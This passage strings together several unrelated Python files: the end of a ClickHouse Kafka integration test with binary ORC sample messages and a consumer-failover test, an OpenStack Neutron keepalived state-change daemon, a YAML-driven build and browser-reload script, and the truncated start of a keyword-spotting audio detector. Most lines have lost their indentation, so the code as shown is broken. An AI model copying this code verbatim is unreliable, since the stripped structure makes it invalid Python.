00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# broken message
b'\x4f\x52\x43\x0a\x0b\x0a\x03\x00\x00\x00\x12\x04\x08\x01\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x29\x0a\x04\x00\x00\x00\x00\x12\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\xff\x80\xff\x80\xff\x00\xff\x80\xff\x03\x42\x41\x44\xff\x80\xff\x02\x41\x4d\xff\x80\x00\x00\x00\x3f\xff\x80\xff\x01\x0a\x06\x08\x06\x10\x00\x18\x0d\x0a\x06\x08\x06\x10\x01\x18\x17\x0a\x06\x08\x06\x10\x02\x18\x14\x0a\x06\x08\x06\x10\x03\x18\x14\x0a\x06\x08\x06\x10\x04\x18\x2b\x0a\x06\x08\x06\x10\x05\x18\x17\x0a\x06\x08\x00\x10\x00\x18\x02\x0a\x06\x08\x00\x10\x01\x18\x02\x0a\x06\x08\x01\x10\x01\x18\x02\x0a\x06\x08\x00\x10\x02\x18\x02\x0a\x06\x08\x02\x10\x02\x18\x02\x0a\x06\x08\x01\x10\x02\x18\x03\x0a\x06\x08\x00\x10\x03\x18\x02\x0a\x06\x08\x02\x10\x03\x18\x02\x0a\x06\x08\x01\x10\x03\x18\x02\x0a\x06\x08\x00\x10\x04\x18\x02\x0a\x06\x08\x01\x10\x04\x18\x04\x0a\x06\x08\x00\x10\x05\x18\x02\x0a\x06\x08\x01\x10\x05\x18\x02\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x1a\x03\x47\x4d\x54\x0a\x59\x0a\x04\x08\x01\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x08\x03\x10\xec\x02\x1a\x0c\x08\x03\x10\x8e\x01\x18\x1d\x20\xc1\x01\x28\x01\x22\x2e\x08\x0c\x12\x05\x01\x02\x03\x04\x05\x1a\x02\x69\x64\x1a\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x1a\x04\x76\x61\x6c\x31\x1a\x04\x76\x61\x6c\x32\x1a\x04\x76\x61\x6c\x33\x20\x00\x28\x00\x30\x00\x22\x08\x08\x04\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x05\x20\x00\x28\x00\x30\x00\x22\x08\x08\x01\x20\x00\x28\x00\x30\x00\x30\x01\x3a\x04\x08\x01\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x3a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x40\x90\x4e\x48\x01\x08\xd5\x01\x10\x00\x18\x80\x80\x04\x22\x02\x00\x0b\x28\x5b\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
],
'expected':r'''{"raw_message":"4F52430A0B0A030000001204080150000A150A050000000000120C0801120608001000180050000A120A06000000000000120808014202080650000A120A06000000000000120808014202080450000A290A0400000000122108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A150A050000000000120C080112060802100218025000FF80FF80FF00FF80FF03424144FF80FF02414DFF800000003FFF80FF010A0608061000180D0A060806100118170A060806100218140A060806100318140A0608061004182B0A060806100518170A060800100018020A060800100118020A060801100118020A060800100218020A060802100218020A060801100218030A060800100318020A060802100318020A060801100318020A060800100418020A060801100418040A060800100518020A060801100518021204080010001204080010001204080010001204080010001204080010001204080010001A03474D540A590A04080150000A0C0801120608001000180050000A0808014202080650000A0808014202080450000A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A0C080112060802100218025000080310EC021A0C0803108E01181D20C1012801222E080C120501020304051A0269641A07626C6F636B4E6F1A0476616C311A0476616C321A0476616C33200028003000220808042000280030002208080820002800300022080808200028003000220808052000280030002208080120002800300030013A04080150003A0C0801120608001000180050003A0808014202080650003A0808014202080450003A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50003A0C08011206080210021802500040904E480108D5011000188080042202000B285B300682F403034F524318","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception."}''',
'printable':False,
}
}
topic_name_prefix = 'format_tests_4_stream_'
for format_name, format_opts in list(all_formats.items()):
print(('Set up {}'.format(format_name)))
topic_name = topic_name_prefix + '{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
raw_message = '_raw_message'
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
        if not format_opts.get('printable', False):
raw_message = 'hex(_raw_message)'
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = '{format_name}',
kafka_handle_error_mode = 'stream',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_data_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_data_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name}
WHERE length(_error) = 0;
DROP TABLE IF EXISTS test.kafka_errors_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_errors_{format_name}_mv Engine=Log AS
SELECT {raw_message} as raw_message, _error as error, _topic as topic, _partition as partition, _offset as offset FROM test.kafka_{format_name}
WHERE length(_error) > 0;
'''.format(topic_name=topic_name, format_name=format_name, raw_message=raw_message,
extra_settings=format_opts.get('extra_settings') or ''))
for format_name, format_opts in list(all_formats.items()):
print(('Checking {}'.format(format_name)))
topic_name = topic_name_prefix + '{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_data_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
# print(('Checking result\n {result} \n expected \n {expected}\n'.format(result=str(result), expected=str(expected))))
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
errors_result = instance.query('SELECT raw_message, error FROM test.kafka_errors_{format_name}_mv format JSONEachRow'.format(format_name=format_name))
errors_expected = format_opts['expected']
# print(errors_result.strip())
# print(errors_expected.strip())
assert errors_result.strip() == errors_expected.strip(), 'Proper errors for format: {}'.format(format_name)
def wait_for_new_data(table_name, prev_count = 0, max_retries = 120):
retries = 0
while True:
new_count = int(instance.query("SELECT count() FROM {}".format(table_name)))
print(new_count)
if new_count > prev_count:
return new_count
else:
retries += 1
time.sleep(0.5)
if retries > max_retries:
raise Exception("No new data :(")
def test_kafka_consumer_failover(kafka_cluster):
# for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="kafka_consumer_failover", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.kafka3 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.kafka_mv TO test.destination AS
SELECT key, value, 'kafka' as _consumed_by
FROM test.kafka;
CREATE MATERIALIZED VIEW test.kafka2_mv TO test.destination AS
SELECT key, value, 'kafka2' as _consumed_by
FROM test.kafka2;
CREATE MATERIALIZED VIEW test.kafka3_mv TO test.destination AS
SELECT key, value, 'kafka3' as _consumed_by
FROM test.kafka3;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
## all 3 attached, 2 working
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':1,'value': 1}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':1,'value': 1}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination')
## 2 attached, 2 working
instance.query('DETACH TABLE test.kafka')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':2,'value': 2}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':2,'value': 2}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 1 attached, 1 working
instance.query('DETACH TABLE test.kafka2')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':3,'value': 3}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':3,'value': 3}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, 2 working
instance.query('ATTACH TABLE test.kafka')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':4,'value': 4}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':4,'value': 4}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 1 attached, 1 working
instance.query('DETACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':5,'value': 5}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':5,'value': 5}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, 2 working
instance.query('ATTACH TABLE test.kafka2')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':6,'value': 6}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':6,'value': 6}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 3 attached, 2 working
instance.query('ATTACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':7,'value': 7}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':7,'value': 7}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, same 2 working
instance.query('DETACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':8,'value': 8}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':8,'value': 8}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
keepalived_state_change.py
|
# Copyright (c) 2015 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import queue
import sys
import threading
import httplib2
from oslo_config import cfg
from oslo_log import log as logging
from neutron._i18n import _
from neutron.agent.l3 import ha
from neutron.agent.linux import daemon
from neutron.agent.linux import ip_lib
from neutron.agent.linux import utils as agent_utils
from neutron.common import config
from neutron.common import utils as common_utils
from neutron.conf.agent.l3 import keepalived
from neutron import privileged
LOG = logging.getLogger(__name__)
INITIAL_STATE_READ_TIMEOUT = 10
class KeepalivedUnixDomainConnection(agent_utils.UnixDomainHTTPConnection):
def __init__(self, *args, **kwargs):
# Old style super initialization is required!
agent_utils.UnixDomainHTTPConnection.__init__(
self, *args, **kwargs)
self.socket_path = (
ha.L3AgentKeepalivedStateChangeServer.
get_keepalived_state_change_socket_path(cfg.CONF))
class MonitorDaemon(daemon.Daemon):
def __init__(self, pidfile, router_id, user, group, namespace, conf_dir,
interface, cidr):
self.router_id = router_id
self.namespace = namespace
self.conf_dir = conf_dir
self.interface = interface
self.cidr = cidr
self.monitor = None
self.event_stop = threading.Event()
self.event_started = threading.Event()
self.queue = queue.Queue()
self._initial_state = None
super(MonitorDaemon, self).__init__(pidfile, uuid=router_id,
user=user, group=group)
@property
def initial_state(self):
return self._initial_state
@initial_state.setter
def initial_state(self, state):
if not self._initial_state:
LOG.debug('Initial status of router %s is %s', self.router_id,
state)
self._initial_state = state
def run(self):
self._thread_initial_state = threading.Thread(
target=self.handle_initial_state)
self._thread_ip_monitor = threading.Thread(
target=ip_lib.ip_monitor,
args=(self.namespace, self.queue, self.event_stop,
self.event_started))
self._thread_read_queue = threading.Thread(
target=self.read_queue,
args=(self.queue, self.event_stop, self.event_started))
self._thread_initial_state.start()
self._thread_ip_monitor.start()
self._thread_read_queue.start()
# NOTE(ralonsoh): if the initial status is not read in a defined
# timeout, "backup" state is set.
self._thread_initial_state.join(timeout=INITIAL_STATE_READ_TIMEOUT)
if not self.initial_state:
LOG.warning('Timeout reading the initial status of router %s, '
'state is set to "backup".', self.router_id)
self.write_state_change('backup')
self.notify_agent('backup')
self._thread_read_queue.join()
def read_queue(self, _queue, event_stop, event_started):
event_started.wait()
while not event_stop.is_set():
try:
event = _queue.get(timeout=2)
except queue.Empty:
event = None
if not event:
continue
if event['name'] == self.interface and event['cidr'] == self.cidr:
if event['event'] == 'added':
new_state = 'primary'
else:
new_state = 'backup'
self.write_state_change(new_state)
self.notify_agent(new_state)
def handle_initial_state(self):
try:
state = 'backup'
cidr = common_utils.ip_to_cidr(self.cidr)
# NOTE(ralonsoh): "get_devices_with_ip" without passing an IP
# address performs one single pyroute2 command. Because the number
# of interfaces in the namespace is reduced, this is faster.
for address in ip_lib.get_devices_with_ip(self.namespace):
if (address['name'] == self.interface and
address['cidr'] == cidr):
state = 'primary'
break
if not self.initial_state:
self.write_state_change(state)
self.notify_agent(state)
except Exception:
if not self.initial_state:
LOG.exception('Failed to get initial status of router %s',
self.router_id)
def write_state_change(self, state):
self.initial_state = state
with open(os.path.join(
self.conf_dir, 'state'), 'w') as state_file:
state_file.write(state)
LOG.debug('Wrote router %s state %s', self.router_id, state)
def notify_agent(self, state):
resp, content = httplib2.Http().request(
# Note that the message is sent via a Unix domain socket so that
# the URL doesn't matter.
'http://127.0.0.1/',
headers={'X-Neutron-Router-Id': self.router_id,
'X-Neutron-State': state},
connection_type=KeepalivedUnixDomainConnection)
if resp.status != 200:
raise Exception(_('Unexpected response: %s') % resp)
LOG.debug('Notified agent router %s, state %s', self.router_id, state)
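        # Roughly what the call above puts on the wire, for illustration only
        # (the header names come from this method; the verb and target URL are
        # httplib2 defaults, so treat the exact format as an assumption):
        #
        #   GET / HTTP/1.1
        #   X-Neutron-Router-Id: <router_id>
        #   X-Neutron-State: <'primary' or 'backup'>
        #
        # The request travels over the keepalived state-change Unix domain
        # socket, so the 127.0.0.1 URL is never actually resolved.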
def handle_sigterm(self, signum, frame):
self.event_stop.set()
self._thread_read_queue.join(timeout=5)
super(MonitorDaemon, self).handle_sigterm(signum, frame)
def configure(conf):
config.init(sys.argv[1:])
conf.set_override('log_dir', cfg.CONF.conf_dir)
conf.set_override('debug', True)
conf.set_override('use_syslog', True)
config.setup_logging()
privileged.default.set_client_mode(False)
def main():
keepalived.register_cli_l3_agent_keepalived_opts()
keepalived.register_l3_agent_keepalived_opts()
configure(cfg.CONF)
MonitorDaemon(cfg.CONF.pid_file,
cfg.CONF.router_id,
cfg.CONF.user,
cfg.CONF.group,
cfg.CONF.namespace,
cfg.CONF.conf_dir,
cfg.CONF.monitor_interface,
cfg.CONF.monitor_cidr).start()
|
sbuild.py
|
import yaml
import os
import sys
import time
import threading
from selenium import webdriver
###################################################
import serverutils.process
serverutils.process.VERBOSE = False
from serverutils.process import PopenProcess
###################################################
ANSI = {
"NONE" : "",
"BLACK" : '\033[30m',
"RED" : '\033[31m',
"GREEN" : '\033[32m',
"YELLOW" : '\033[33m',
"BLUE" : '\033[34m',
"MAGENTA" : '\033[35m',
"CYAN" : '\033[36m',
"WHITE" : '\033[37m',
"BRIGHTBLACK" : '\033[90m',
"BRIGHTRED" : '\033[91m',
"BRIGHTGREEN" : '\033[92m',
"BRIGHTYELLOW" : '\033[93m',
"BRIGHTBLUE" : '\033[94m',
"BRIGHTMAGENTA" : '\033[95m',
"BRIGHTCYAN" : '\033[96m',
"BRIGHTWHITE" : '\033[97m',
"ENDC" : '\033[0m',
"BOLD" : '\033[1m',
"UNDERLINE" : '\033[4m'
}
###################################################
browser = webdriver.Chrome()
browser.set_window_position(int(os.environ["BROWSER_WINDOW_LEFT"]), int(os.environ["BROWSER_WINDOW_TOP"]))
browser.set_window_size(int(os.environ["BROWSER_WINDOW_WIDTH"]), int(os.environ["BROWSER_WINDOW_HEIGHT"]))
browserinit = True
###################################################
def rf(path, default):
    try:
        return open(path).read()
    except Exception:
        return default
def ry(path, default):
    try:
        # safe_load avoids the Loader-less yaml.load() call, which newer
        # PyYAML versions reject
        return yaml.safe_load(open(path))
    except Exception:
        return default
def procreadline(sline):
print(sline)
def runcmd(cmd):
proc = PopenProcess(cmd, procreadline)
returncode = proc.wait_for_return_code()
return returncode
def getlastmod(path):
stat = os.stat(path)
return stat.st_mtime
###################################################
class BuildCommandFailedException(BaseException):
def __init__(self, rulename, cmd):
self.rulename = rulename
self.cmd = cmd
class BDep:
def __init__(self, path):
self.path = path
class BRule:
def __init__(self, name, rdef):
self.name = name
self.deps = []
for ddef in rdef["deps"]:
self.deps.append(BDep(ddef))
self.cmds = rdef["cmds"]
self.run = rdef.get("run", False)
self.color = rdef.get("color", "NONE")
self.restart = rdef.get("restart", False)
self.refresh = rdef.get("refresh", False)
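# Illustrative only: a minimal bdef.yml that BRule/BDef would accept could look
# roughly like this (rule names are hypothetical, and the exact command syntax
# depends on serverutils.process.PopenProcess, which is not shown here):
#
#   bundle:                          # plain build rule: re-run cmds when deps change
#     deps: ["src/app.js"]
#     cmds: ["npm run build"]
#     color: YELLOW
#   server:                          # long-running task, managed as a BTask
#     deps: ["server.py"]
#     cmds: ["python", "server.py"]  # cmds[0] is the program, the rest are its args
#     run: true
#     color: CYAN
#     refresh: false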
class BTask:
def __init__(self, name, cmds, color = "NONE"):
self.name = name
self.cmds = cmds
self.color = color
self.proc = None
def procreadline(self, sline):
print(ANSI[self.color] + self.name + ANSI["ENDC"] + " > " + ANSI[self.color] + sline)
def procreaderror(self, sline):
print(ANSI[self.color] + self.name + ANSI["BRIGHTWHITE"] + " ! " + ANSI["BRIGHTRED"] + sline)
def run(self):
print(ANSI["GREEN"])
print("running task: {} {}".format(ANSI["BRIGHTGREEN"], self.name))
pargs = []
if len(self.cmds) > 1:
pargs = self.cmds[1:]
print("\n{}{}{} ".format(ANSI["BRIGHTRED"], "!", ANSI[self.color]), end = "")
self.proc = PopenProcess(
self.cmds[0],
self.procreadline,
read_error_callback = self.procreaderror,
proc_args = pargs,
ignore_cwd = True
)
def kill(self):
print(ANSI["RED"])
print("killing task: {} {}".format(ANSI["BRIGHTRED"], self.name))
self.proc.kill()
    def is_alive(self):
        return self.proc.is_alive()
class BDef:
def __init__(self):
self.rules = []
self.path = "bdef.yml"
self.bdef = None
self.cache = {}
self.tasks = {}
def fromdef(self, bdef):
self.bdef = bdef
for ( name , rdef ) in self.bdef.items():
self.rules.append(BRule(name, rdef))
return self
def frompath(self, path = "bdef.yml"):
self.path = path
        self.fromdef(yaml.safe_load(open(path)))
return self
def cachepath(self):
return self.path + ".cache"
def putcache(self):
yaml.dump(self.cache, open(self.cachepath(),"w"))
return self
def getcache(self):
self.cache = ry(self.cachepath(),{})
self.putcache()
return self
def getlastmodfromcache(self, path):
if path in self.cache:
return self.cache[path]
return 0
def updatecache(self):
for rule in self.rules:
for dep in rule.deps:
path = dep.path
lastmod = getlastmod(path)
self.cache[path] = lastmod
self.putcache()
def build(self, loop = False):
t = time.time()
self.getcache()
somechange = False
for rule in self.rules:
changed = False
for dep in rule.deps:
path = dep.path
lastmodcache = self.getlastmodfromcache(path)
lastmod = getlastmod(dep.path)
if lastmod > lastmodcache:
changed = True
break
if changed:
somechange = True
if rule.run:
if loop:
if rule.refresh:
browser.refresh()
elif rule.name in self.tasks:
task = self.tasks[rule.name]
if changed:
if rule.restart:
sys.exit(0)
else:
task.kill()
task.run()
else:
task = BTask(rule.name, rule.cmds, rule.color)
self.tasks[rule.name] = task
task.run()
time.sleep(1)
elif changed:
print(ANSI["CYAN"])
print("building {}".format(rule.name))
for cmd in rule.cmds:
print(ANSI["YELLOW"])
print("running command {}".format(cmd))
print(ANSI["YELLOW"])
returncode = runcmd(cmd)
print(ANSI["ENDC"])
if returncode > 0:
raise BuildCommandFailedException(rule.name, cmd)
else:
print(ANSI["GREEN"])
print("{} {} success".format(rule.name, cmd))
else:
if not loop:
print(ANSI["MAGENTA"])
print("{} up to date".format(rule.name))
elapsed = time.time() - t
if ( not loop ) or somechange:
print(ANSI["BRIGHTGREEN"])
print("build succeeded in {:.2f} seconds".format(elapsed))
print(ANSI["ENDC"])
self.updatecache()
return somechange
###################################################
b = BDef().frompath()
###################################################
def build_thread_func():
global browserinit
while True:
somechange = b.build(loop = True)
if somechange or browserinit:
if browserinit:
time.sleep(1)
browser.get('http://localhost:5000')
browserinit = False
else:
browser.refresh()
time.sleep(1)
###################################################
bth = threading.Thread(target = build_thread_func)
bth.start()
#b.build(loop = True)
###################################################
|
kws_detector.py
|
"""
This is a packet of KWS detection,
dependent on DNN training part
"""
import pyaudio
import ctypes as ct
import numpy as np
import wave
import math
import matplotlib.pyplot as plt
import os
import librosa
import librosa.display
import threading
import time
from numpy.linalg import norm
from kws_do_inference import KwsNNet
class KwsDetector:
def __init__(self, chunk, record_device_name, record_width, channels, rate, format, wav_path):
        # NOTE: the constructor arguments are currently ignored; the capture
        # settings below are hard-coded for one specific machine.
        self.CHUNK = 1024
        self.RECORD_DEVICE_NAME = "MacBook Pro 麦克风"  # localized "MacBook Pro Microphone"
self.RECORD_WIDTH = 2
self.CHANNELS = 1
self.RATE = 16000
self.FORMAT = pyaudio.paInt16
self.WAV_PATH = "/Users/xyzhao/Desktop/sound_localization/wakeup/stream_tmp"
self.device_index = self.setup_device_index()
now = int(round(time.time()*1000))
self.RANDOM_PREFIX = time.strftime('%m-%d_%H:%M',time.localtime(now/1000))
"""
init NN model, and load graph
"""
# self.KwsNet = KwsNNet(os.path.join(self.WAV_PATH, self.RANDOM_PREFIX + "win.wav"), "Pretrained_models/DNN/DNN_M.pb", "Pretrained_models/labels.txt")
"""
Window settings
"""
        # can be arbitrarily large; it only bounds the total stream length
        self.RECORD_SECONDS = 500
        # the window must be long enough to contain the whole keyword
        self.WINDOW_SECONDS = 1
# number of frames in a stream
self.frame_num_total = int(self.RATE / self.CHUNK * self.RECORD_SECONDS)
# number of frames in a window
self.frame_num_win = int(self.RATE / self.CHUNK * self.WINDOW_SECONDS)
# number of frames for one stride
self.frame_num_stride = 3 # 5
        # flush the buffer after this many windows have been read; large enough
        # that flushing causes no noticeable delay
        self.win_num_flush = 100 # 10
        # frame buffer filled from the stream; needs to be flushed periodically
        self.frames_buffer = []
        # avoids buffer conflicts while a flush is in progress
        self.buffer_lock = threading.Lock()
        # signals a flush so the reader resets its start frame
        self.flush_event = threading.Event()
self.end_event = threading.Event()
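        # Worked example with the defaults above (RATE=16000, CHUNK=1024):
        #   frame_num_win    = int(16000 / 1024 * 1)   = 15 frames  (~0.96 s window)
        #   frame_num_stride = 3 frames                ~= 0.19 s hop between windows
        #   frame_num_total  = int(16000 / 1024 * 500) = 7812 frames per stream
        # These are just the arithmetic consequences of the settings above,
        # not measured values.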
def setup_device_index(self):
device_index = -1
p = pyaudio.PyAudio()
"""
Recognize Mic device, before loop
"""
# scan to get usb device
for index in range(0, p.get_device_count()):
info = p.get_device_info_by_index(index)
